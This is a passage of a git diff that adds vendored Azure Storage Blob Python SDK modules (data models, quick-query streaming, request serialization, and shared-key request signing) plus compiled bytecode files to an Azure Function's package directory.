+ + :param str key_value: + Base64-encoded AES-256 encryption key value. + :param str key_hash: + Base64-encoded SHA256 of the encryption key. + :ivar str algorithm: + Specifies the algorithm to use when encrypting data using the given key. Must be AES256. + """ + def __init__(self, key_value, key_hash): + self.key_value = key_value + self.key_hash = key_hash + self.algorithm = 'AES256' + + +class ContainerEncryptionScope(object): + """The default encryption scope configuration for a container. + + This scope is used implicitly for all future writes within the container, + but can be overridden per blob operation. + + .. versionadded:: 12.2.0 + + :param str default_encryption_scope: + Specifies the default encryption scope to set on the container and use for + all future writes. + :param bool prevent_encryption_scope_override: + If true, prevents any request from specifying a different encryption scope than the scope + set on the container. Default value is false. + """ + + def __init__(self, default_encryption_scope, **kwargs): + self.default_encryption_scope = default_encryption_scope + self.prevent_encryption_scope_override = kwargs.get('prevent_encryption_scope_override', False) + + @classmethod + def _from_generated(cls, generated): + if generated.properties.default_encryption_scope: + scope = cls( + generated.properties.default_encryption_scope, + prevent_encryption_scope_override=generated.properties.prevent_encryption_scope_override or False + ) + return scope + return None + + +class DelimitedJsonDialect(DictMixin): + """Defines the input or output JSON serialization for a blob data query. + + :keyword str delimiter: The line separator character, default value is '\n' + """ + + def __init__(self, **kwargs): + self.delimiter = kwargs.pop('delimiter', '\n') + + +class DelimitedTextDialect(DictMixin): + """Defines the input or output delimited (CSV) serialization for a blob query request. + + :keyword str delimiter: + Column separator, defaults to ','. + :keyword str quotechar: + Field quote, defaults to '"'. + :keyword str lineterminator: + Record separator, defaults to '\\\\n'. + :keyword str escapechar: + Escape char, defaults to empty. + :keyword bool has_header: + Whether the blob data includes headers in the first line. The default value is False, meaning that the + data will be returned inclusive of the first line. If set to True, the data will be returned exclusive + of the first line. + """ + def __init__(self, **kwargs): + self.delimiter = kwargs.pop('delimiter', ',') + self.quotechar = kwargs.pop('quotechar', '"') + self.lineterminator = kwargs.pop('lineterminator', '\n') + self.escapechar = kwargs.pop('escapechar', "") + self.has_header = kwargs.pop('has_header', False) + + +class ArrowDialect(ArrowField): + """field of an arrow schema. + + All required parameters must be populated in order to send to Azure. + + :param ~azure.storage.blob.ArrowType type: Arrow field type. + :keyword str name: The name of the field. + :keyword int precision: The precision of the field. + :keyword int scale: The scale of the field. + """ + def __init__(self, type, **kwargs): # pylint: disable=redefined-builtin + super(ArrowDialect, self).__init__(type=type, **kwargs) + + +class ArrowType(str, Enum, metaclass=CaseInsensitiveEnumMeta): + + INT64 = "int64" + BOOL = "bool" + TIMESTAMP_MS = "timestamp[ms]" + STRING = "string" + DOUBLE = "double" + DECIMAL = 'decimal' + + +class ObjectReplicationPolicy(DictMixin): + """Policy id and rule ids applied to a blob. 
+
+    :ivar str policy_id:
+        Policy id for the blob. A replication policy gets created (policy id) when creating a source/destination pair.
+    :ivar list(~azure.storage.blob.ObjectReplicationRule) rules:
+        Within each policy there may be multiple replication rules.
+        e.g. rule 1 = src/container/.pdf to dst/container2/; rule 2 = src/container1/.jpg to dst/container3
+    """
+
+    def __init__(self, **kwargs):
+        self.policy_id = kwargs.pop('policy_id', None)
+        self.rules = kwargs.pop('rules', None)
+
+
+class ObjectReplicationRule(DictMixin):
+    """A single replication rule applied to a blob.
+
+    :ivar str rule_id:
+        Rule id.
+    :ivar str status:
+        The status of the rule. It can be "Complete" or "Failed".
+    """
+
+    def __init__(self, **kwargs):
+        self.rule_id = kwargs.pop('rule_id', None)
+        self.status = kwargs.pop('status', None)
+
+
+class BlobQueryError(object):
+    """An error that occurred during a quick query operation.
+
+    :ivar str error:
+        The name of the error.
+    :ivar bool is_fatal:
+        If true, this error prevents further query processing. More result data may be returned,
+        but there is no guarantee that all of the original data will be processed.
+        If false, this error does not prevent further query processing.
+    :ivar str description:
+        A description of the error.
+    :ivar int position:
+        The blob offset at which the error occurred.
+    """
+    def __init__(self, error=None, is_fatal=False, description=None, position=None):
+        self.error = error
+        self.is_fatal = is_fatal
+        self.description = description
+        self.position = position
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_quick_query_helper.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_quick_query_helper.py
new file mode 100644
index 0000000..ab3772d
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_quick_query_helper.py
@@ -0,0 +1,195 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+
+from io import BytesIO
+from typing import Union, Iterable, IO  # pylint: disable=unused-import
+
+from ._shared.avro.datafile import DataFileReader
+from ._shared.avro.avro_io import DatumReader
+
+
+class BlobQueryReader(object):  # pylint: disable=too-many-instance-attributes
+    """A streaming object to read query results.
+
+    :ivar str name:
+        The name of the blob being queried.
+    :ivar str container:
+        The name of the container where the blob is.
+    :ivar dict response_headers:
+        The response_headers of the quick query request.
+    :ivar bytes record_delimiter:
+        The delimiter used to separate lines, or records, within the data. The `records`
+        method will return these lines via a generator.
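+
+    Example (an illustrative sketch; ``blob_client`` is assumed to be an
+    existing ``BlobClient`` whose ``query_blob`` method returns this reader):
+
+    .. code-block:: python
+
+        reader = blob_client.query_blob("SELECT * from BlobStorage")
+        data = reader.readall()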
+    """
+
+    def __init__(
+        self,
+        name=None,
+        container=None,
+        errors=None,
+        record_delimiter='\n',
+        encoding=None,
+        headers=None,
+        response=None,
+        error_cls=None,
+    ):
+        self.name = name
+        self.container = container
+        self.response_headers = headers
+        self.record_delimiter = record_delimiter
+        self._size = 0
+        self._bytes_processed = 0
+        self._errors = errors
+        self._encoding = encoding
+        self._parsed_results = DataFileReader(QuickQueryStreamer(response), DatumReader())
+        self._first_result = self._process_record(next(self._parsed_results))
+        self._error_cls = error_cls
+
+    def __len__(self):
+        return self._size
+
+    def _process_record(self, result):
+        self._size = result.get('totalBytes', self._size)
+        self._bytes_processed = result.get('bytesScanned', self._bytes_processed)
+        if 'data' in result:
+            return result.get('data')
+        if 'fatal' in result:
+            error = self._error_cls(
+                error=result['name'],
+                is_fatal=result['fatal'],
+                description=result['description'],
+                position=result['position']
+            )
+            if self._errors:
+                self._errors(error)
+        return None
+
+    def _iter_stream(self):
+        if self._first_result is not None:
+            yield self._first_result
+        for next_result in self._parsed_results:
+            processed_result = self._process_record(next_result)
+            if processed_result is not None:
+                yield processed_result
+
+    def readall(self):
+        # type: () -> Union[bytes, str]
+        """Return all query results.
+
+        This operation blocks until all data is downloaded.
+        If encoding has been configured, it will be used to decode individual
+        records as they are received.
+
+        :rtype: Union[bytes, str]
+        """
+        stream = BytesIO()
+        self.readinto(stream)
+        data = stream.getvalue()
+        if self._encoding:
+            return data.decode(self._encoding)
+        return data
+
+    def readinto(self, stream):
+        # type: (IO) -> None
+        """Download the query result to a stream.
+
+        :param stream:
+            The stream to download to. This can be an open file-handle,
+            or any writable stream.
+        :returns: None
+        """
+        for record in self._iter_stream():
+            stream.write(record)
+
+    def records(self):
+        # type: () -> Iterable[Union[bytes, str]]
+        """Returns a record generator for the query result.
+
+        Records will be returned line by line.
+        If encoding has been configured, it will be used to decode individual
+        records as they are received.
+
+        :rtype: Iterable[Union[bytes, str]]
+        """
+        delimiter = self.record_delimiter.encode('utf-8')
+        for record_chunk in self._iter_stream():
+            for record in record_chunk.split(delimiter):
+                if self._encoding:
+                    yield record.decode(self._encoding)
+                else:
+                    yield record
+
+
+class QuickQueryStreamer(object):
+    """
+    File-like streaming iterator.
+    """
+
+    def __init__(self, generator):
+        self.generator = generator
+        self.iterator = iter(generator)
+        self._buf = b""
+        self._point = 0
+        self._download_offset = 0
+        self._buf_start = 0
+        self.file_length = None
+
+    def __len__(self):
+        return self.file_length
+
+    def __iter__(self):
+        return self.iterator
+
+    @staticmethod
+    def seekable():
+        return True
+
+    def __next__(self):
+        next_part = next(self.iterator)
+        self._download_offset += len(next_part)
+        return next_part
+
+    next = __next__  # Python 2 compatibility.
+
+    def tell(self):
+        return self._point
+
+    def seek(self, offset, whence=0):
+        if whence == 0:
+            self._point = offset
+        elif whence == 1:
+            self._point += offset
+        else:
+            raise ValueError("whence must be 0 or 1")
+        if self._point < 0:
+            self._point = 0  # XXX is this right?
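+
+    # A minimal sketch of the expected call pattern (hypothetical chunk sizes;
+    # QuickQueryStreamer is an internal helper, not part of the public API):
+    #
+    #     streamer = QuickQueryStreamer(iter([b"abcd", b"efgh"]))
+    #     streamer.read(6)   # -> b"abcdef", pulling two chunks from the source
+    #     streamer.tell()    # -> 6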
+ + def read(self, size): + try: + # keep reading from the generator until the buffer of this stream has enough data to read + while self._point + size > self._download_offset: + self._buf += self.__next__() + except StopIteration: + self.file_length = self._download_offset + + start_point = self._point + + # EOF + self._point = min(self._point + size, self._download_offset) + + relative_start = start_point - self._buf_start + if relative_start < 0: + raise ValueError("Buffer has dumped too much data") + relative_end = relative_start + size + data = self._buf[relative_start: relative_end] + + # dump the extra data in buffer + # buffer start--------------------16bytes----current read position + dumped_size = max(relative_end - 16 - relative_start, 0) + self._buf_start += dumped_size + self._buf = self._buf[dumped_size:] + + return data diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_serialize.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_serialize.py new file mode 100644 index 0000000..4d938c2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_serialize.py @@ -0,0 +1,216 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=no-self-use +from typing import ( # pylint: disable=unused-import + Any, Dict, Optional, Tuple, Union, + TYPE_CHECKING) + +try: + from urllib.parse import quote +except ImportError: + from urllib2 import quote # type: ignore + +from azure.core import MatchConditions + +from ._models import ( + ContainerEncryptionScope, + DelimitedJsonDialect) +from ._generated.models import ( + ModifiedAccessConditions, + SourceModifiedAccessConditions, + CpkScopeInfo, + ContainerCpkScopeInfo, + QueryFormat, + QuerySerialization, + DelimitedTextConfiguration, + JsonTextConfiguration, + ArrowConfiguration, + QueryFormatType, + BlobTag, + BlobTags, LeaseAccessConditions +) + +if TYPE_CHECKING: + from ._lease import BlobLeaseClient + + +_SUPPORTED_API_VERSIONS = [ + '2019-02-02', + '2019-07-07', + '2019-10-10', + '2019-12-12', + '2020-02-10', + '2020-04-08', + '2020-06-12', + '2020-08-04', + '2020-10-02', + '2020-12-06', + '2021-02-12', + '2021-04-10', + '2021-06-08' +] + + +def _get_match_headers(kwargs, match_param, etag_param): + # type: (Dict[str, Any], str, str) -> Tuple(Dict[str, Any], Optional[str], Optional[str]) + if_match = None + if_none_match = None + match_condition = kwargs.pop(match_param, None) + if match_condition == MatchConditions.IfNotModified: + if_match = kwargs.pop(etag_param, None) + if not if_match: + raise ValueError("'{}' specified without '{}'.".format(match_param, etag_param)) + elif match_condition == MatchConditions.IfPresent: + if_match = '*' + elif match_condition == MatchConditions.IfModified: + if_none_match = kwargs.pop(etag_param, None) + if not if_none_match: + raise ValueError("'{}' specified without '{}'.".format(match_param, etag_param)) + elif match_condition == MatchConditions.IfMissing: + if_none_match = '*' + elif match_condition is None: + if kwargs.get(etag_param): + raise ValueError("'{}' specified without '{}'.".format(etag_param, match_param)) + else: + raise 
TypeError("Invalid match condition: {}".format(match_condition)) + return if_match, if_none_match + + +def get_access_conditions(lease): + # type: (Optional[Union[BlobLeaseClient, str]]) -> Union[LeaseAccessConditions, None] + try: + lease_id = lease.id # type: ignore + except AttributeError: + lease_id = lease # type: ignore + return LeaseAccessConditions(lease_id=lease_id) if lease_id else None + + +def get_modify_conditions(kwargs): + # type: (Dict[str, Any]) -> ModifiedAccessConditions + if_match, if_none_match = _get_match_headers(kwargs, 'match_condition', 'etag') + return ModifiedAccessConditions( + if_modified_since=kwargs.pop('if_modified_since', None), + if_unmodified_since=kwargs.pop('if_unmodified_since', None), + if_match=if_match or kwargs.pop('if_match', None), + if_none_match=if_none_match or kwargs.pop('if_none_match', None), + if_tags=kwargs.pop('if_tags_match_condition', None) + ) + + +def get_source_conditions(kwargs): + # type: (Dict[str, Any]) -> SourceModifiedAccessConditions + if_match, if_none_match = _get_match_headers(kwargs, 'source_match_condition', 'source_etag') + return SourceModifiedAccessConditions( + source_if_modified_since=kwargs.pop('source_if_modified_since', None), + source_if_unmodified_since=kwargs.pop('source_if_unmodified_since', None), + source_if_match=if_match or kwargs.pop('source_if_match', None), + source_if_none_match=if_none_match or kwargs.pop('source_if_none_match', None), + source_if_tags=kwargs.pop('source_if_tags_match_condition', None) + ) + + +def get_cpk_scope_info(kwargs): + # type: (Dict[str, Any]) -> CpkScopeInfo + if 'encryption_scope' in kwargs: + return CpkScopeInfo(encryption_scope=kwargs.pop('encryption_scope')) + return None + + +def get_container_cpk_scope_info(kwargs): + # type: (Dict[str, Any]) -> ContainerCpkScopeInfo + encryption_scope = kwargs.pop('container_encryption_scope', None) + if encryption_scope: + if isinstance(encryption_scope, ContainerEncryptionScope): + return ContainerCpkScopeInfo( + default_encryption_scope=encryption_scope.default_encryption_scope, + prevent_encryption_scope_override=encryption_scope.prevent_encryption_scope_override + ) + if isinstance(encryption_scope, dict): + return ContainerCpkScopeInfo( + default_encryption_scope=encryption_scope['default_encryption_scope'], + prevent_encryption_scope_override=encryption_scope.get('prevent_encryption_scope_override') + ) + raise TypeError("Container encryption scope must be dict or type ContainerEncryptionScope.") + return None + + +def get_api_version(kwargs): + # type: (Dict[str, Any]) -> str + api_version = kwargs.get('api_version', None) + if api_version and api_version not in _SUPPORTED_API_VERSIONS: + versions = '\n'.join(_SUPPORTED_API_VERSIONS) + raise ValueError("Unsupported API version '{}'. 
Please select from:\n{}".format(api_version, versions)) + return api_version or _SUPPORTED_API_VERSIONS[-1] + + +def serialize_blob_tags_header(tags=None): + # type: (Optional[Dict[str, str]]) -> str + if tags is None: + return None + + components = list() + if tags: + for key, value in tags.items(): + components.append(quote(key, safe='.-')) + components.append('=') + components.append(quote(value, safe='.-')) + components.append('&') + + if components: + del components[-1] + + return ''.join(components) + + +def serialize_blob_tags(tags=None): + # type: (Optional[Dict[str, str]]) -> Union[BlobTags, None] + tag_list = list() + if tags: + tag_list = [BlobTag(key=k, value=v) for k, v in tags.items()] + return BlobTags(blob_tag_set=tag_list) + + +def serialize_query_format(formater): + if formater == "ParquetDialect": + qq_format = QueryFormat( + type=QueryFormatType.PARQUET, + parquet_text_configuration=' ' + ) + elif isinstance(formater, DelimitedJsonDialect): + serialization_settings = JsonTextConfiguration( + record_separator=formater.delimiter + ) + qq_format = QueryFormat( + type=QueryFormatType.json, + json_text_configuration=serialization_settings) + elif hasattr(formater, 'quotechar'): # This supports a csv.Dialect as well + try: + headers = formater.has_header + except AttributeError: + headers = False + serialization_settings = DelimitedTextConfiguration( + column_separator=formater.delimiter, + field_quote=formater.quotechar, + record_separator=formater.lineterminator, + escape_char=formater.escapechar, + headers_present=headers + ) + qq_format = QueryFormat( + type=QueryFormatType.delimited, + delimited_text_configuration=serialization_settings + ) + elif isinstance(formater, list): + serialization_settings = ArrowConfiguration( + schema=formater + ) + qq_format = QueryFormat( + type=QueryFormatType.arrow, + arrow_configuration=serialization_settings) + elif not formater: + return None + else: + raise TypeError("Format must be DelimitedTextDialect or DelimitedJsonDialect or ParquetDialect.") + return QuerySerialization(format=qq_format) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__init__.py new file mode 100644 index 0000000..473943d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__init__.py @@ -0,0 +1,56 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. 
+# -------------------------------------------------------------------------- + +import base64 +import hashlib +import hmac + +try: + from urllib.parse import quote, unquote +except ImportError: + from urllib2 import quote, unquote # type: ignore + +import six + + +def url_quote(url): + return quote(url) + + +def url_unquote(url): + return unquote(url) + + +def encode_base64(data): + if isinstance(data, six.text_type): + data = data.encode('utf-8') + encoded = base64.b64encode(data) + return encoded.decode('utf-8') + + +def decode_base64_to_bytes(data): + if isinstance(data, six.text_type): + data = data.encode('utf-8') + return base64.b64decode(data) + + +def decode_base64_to_text(data): + decoded_bytes = decode_base64_to_bytes(data) + return decoded_bytes.decode('utf-8') + + +def sign_string(key, string_to_sign, key_is_base64=True): + if key_is_base64: + key = decode_base64_to_bytes(key) + else: + if isinstance(key, six.text_type): + key = key.encode('utf-8') + if isinstance(string_to_sign, six.text_type): + string_to_sign = string_to_sign.encode('utf-8') + signed_hmac_sha256 = hmac.HMAC(key, string_to_sign, hashlib.sha256) + digest = signed_hmac_sha256.digest() + encoded_digest = encode_base64(digest) + return encoded_digest diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..d5390b2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/authentication.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/authentication.cpython-39.pyc new file mode 100644 index 0000000..ec8789a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/authentication.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/base_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/base_client.cpython-39.pyc new file mode 100644 index 0000000..8d83626 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/base_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/base_client_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/base_client_async.cpython-39.pyc new file mode 100644 index 0000000..750db1e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/base_client_async.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/constants.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/constants.cpython-39.pyc new file mode 100644 index 0000000..f1d044e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/constants.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/encryption.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/encryption.cpython-39.pyc new file mode 100644 index 0000000..6501dd9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/encryption.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/models.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/models.cpython-39.pyc new file mode 100644 index 0000000..cebc625 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/models.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/parser.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/parser.cpython-39.pyc new file mode 100644 index 0000000..641a116 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/parser.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/policies.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/policies.cpython-39.pyc new file mode 100644 index 0000000..46350fb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/policies.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/policies_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/policies_async.cpython-39.pyc new file mode 100644 index 0000000..b682a2d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/policies_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/request_handlers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/request_handlers.cpython-39.pyc new file mode 100644 index 0000000..a2bb396 
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/request_handlers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/response_handlers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/response_handlers.cpython-39.pyc new file mode 100644 index 0000000..a9babe3 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/response_handlers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/shared_access_signature.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/shared_access_signature.cpython-39.pyc new file mode 100644 index 0000000..b7baac9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/shared_access_signature.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/uploads.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/uploads.cpython-39.pyc new file mode 100644 index 0000000..75e9213 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/uploads.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/uploads_async.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/uploads_async.cpython-39.pyc new file mode 100644 index 0000000..2156ba5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/__pycache__/uploads_async.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/authentication.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/authentication.py new file mode 100644 index 0000000..292cdaa --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/authentication.py @@ -0,0 +1,178 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. 
+# -------------------------------------------------------------------------- + +import logging +import re +import sys + +try: + from urllib.parse import urlparse, unquote +except ImportError: + from urlparse import urlparse # type: ignore + from urllib2 import unquote # type: ignore + +try: + from yarl import URL +except ImportError: + pass + +try: + from azure.core.pipeline.transport import AioHttpTransport +except ImportError: + AioHttpTransport = None + +from azure.core.exceptions import ClientAuthenticationError +from azure.core.pipeline.policies import SansIOHTTPPolicy + +from . import sign_string + + +logger = logging.getLogger(__name__) + + + +# wraps a given exception with the desired exception type +def _wrap_exception(ex, desired_type): + msg = "" + if ex.args: + msg = ex.args[0] + if sys.version_info >= (3,): + # Automatic chaining in Python 3 means we keep the trace + return desired_type(msg) + # There isn't a good solution in 2 for keeping the stack trace + # in general, or that will not result in an error in 3 + # However, we can keep the previous error type and message + # TODO: In the future we will log the trace + return desired_type('{}: {}'.format(ex.__class__.__name__, msg)) + + +class AzureSigningError(ClientAuthenticationError): + """ + Represents a fatal error when attempting to sign a request. + In general, the cause of this exception is user error. For example, the given account key is not valid. + Please visit https://docs.microsoft.com/en-us/azure/storage/common/storage-create-storage-account for more info. + """ + + +# pylint: disable=no-self-use +class SharedKeyCredentialPolicy(SansIOHTTPPolicy): + + def __init__(self, account_name, account_key): + self.account_name = account_name + self.account_key = account_key + super(SharedKeyCredentialPolicy, self).__init__() + + @staticmethod + def _get_headers(request, headers_to_sign): + headers = dict((name.lower(), value) for name, value in request.http_request.headers.items() if value) + if 'content-length' in headers and headers['content-length'] == '0': + del headers['content-length'] + return '\n'.join(headers.get(x, '') for x in headers_to_sign) + '\n' + + @staticmethod + def _get_verb(request): + return request.http_request.method + '\n' + + def _get_canonicalized_resource(self, request): + uri_path = urlparse(request.http_request.url).path + try: + if isinstance(request.context.transport, AioHttpTransport) or \ + isinstance(getattr(request.context.transport, "_transport", None), AioHttpTransport) or \ + isinstance(getattr(getattr(request.context.transport, "_transport", None), "_transport", None), + AioHttpTransport): + uri_path = URL(uri_path) + return '/' + self.account_name + str(uri_path) + except TypeError: + pass + return '/' + self.account_name + uri_path + + @staticmethod + def _get_canonicalized_headers(request): + string_to_sign = '' + x_ms_headers = [] + for name, value in request.http_request.headers.items(): + if name.startswith('x-ms-'): + x_ms_headers.append((name.lower(), value)) + x_ms_headers.sort() + for name, value in x_ms_headers: + if value is not None: + string_to_sign += ''.join([name, ':', value, '\n']) + return string_to_sign + + @staticmethod + def _get_canonicalized_resource_query(request): + sorted_queries = list(request.http_request.query.items()) + sorted_queries.sort() + + string_to_sign = '' + for name, value in sorted_queries: + if value is not None: + string_to_sign += '\n' + name.lower() + ':' + unquote(value) + + return string_to_sign + + def _add_authorization_header(self, 
request, string_to_sign): + try: + signature = sign_string(self.account_key, string_to_sign) + auth_string = 'SharedKey ' + self.account_name + ':' + signature + request.http_request.headers['Authorization'] = auth_string + except Exception as ex: + # Wrap any error that occurred as signing error + # Doing so will clarify/locate the source of problem + raise _wrap_exception(ex, AzureSigningError) + + def on_request(self, request): + string_to_sign = \ + self._get_verb(request) + \ + self._get_headers( + request, + [ + 'content-encoding', 'content-language', 'content-length', + 'content-md5', 'content-type', 'date', 'if-modified-since', + 'if-match', 'if-none-match', 'if-unmodified-since', 'byte_range' + ] + ) + \ + self._get_canonicalized_headers(request) + \ + self._get_canonicalized_resource(request) + \ + self._get_canonicalized_resource_query(request) + + self._add_authorization_header(request, string_to_sign) + #logger.debug("String_to_sign=%s", string_to_sign) + + +class StorageHttpChallenge(object): + def __init__(self, challenge): + """ Parses an HTTP WWW-Authentication Bearer challenge from the Storage service. """ + if not challenge: + raise ValueError("Challenge cannot be empty") + + self._parameters = {} + self.scheme, trimmed_challenge = challenge.strip().split(" ", 1) + + # name=value pairs either comma or space separated with values possibly being + # enclosed in quotes + for item in re.split('[, ]', trimmed_challenge): + comps = item.split("=") + if len(comps) == 2: + key = comps[0].strip(' "') + value = comps[1].strip(' "') + if key: + self._parameters[key] = value + + # Extract and verify required parameters + self.authorization_uri = self._parameters.get('authorization_uri') + if not self.authorization_uri: + raise ValueError("Authorization Uri not found") + + self.resource_id = self._parameters.get('resource_id') + if not self.resource_id: + raise ValueError("Resource id not found") + + uri_path = urlparse(self.authorization_uri).path.lstrip("/") + self.tenant_id = uri_path.split("/")[0] + + def get_value(self, key): + return self._parameters.get(key) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__init__.py new file mode 100644 index 0000000..fb40d51 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_shared/avro/__init__.py @@ -0,0 +1,5 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. 
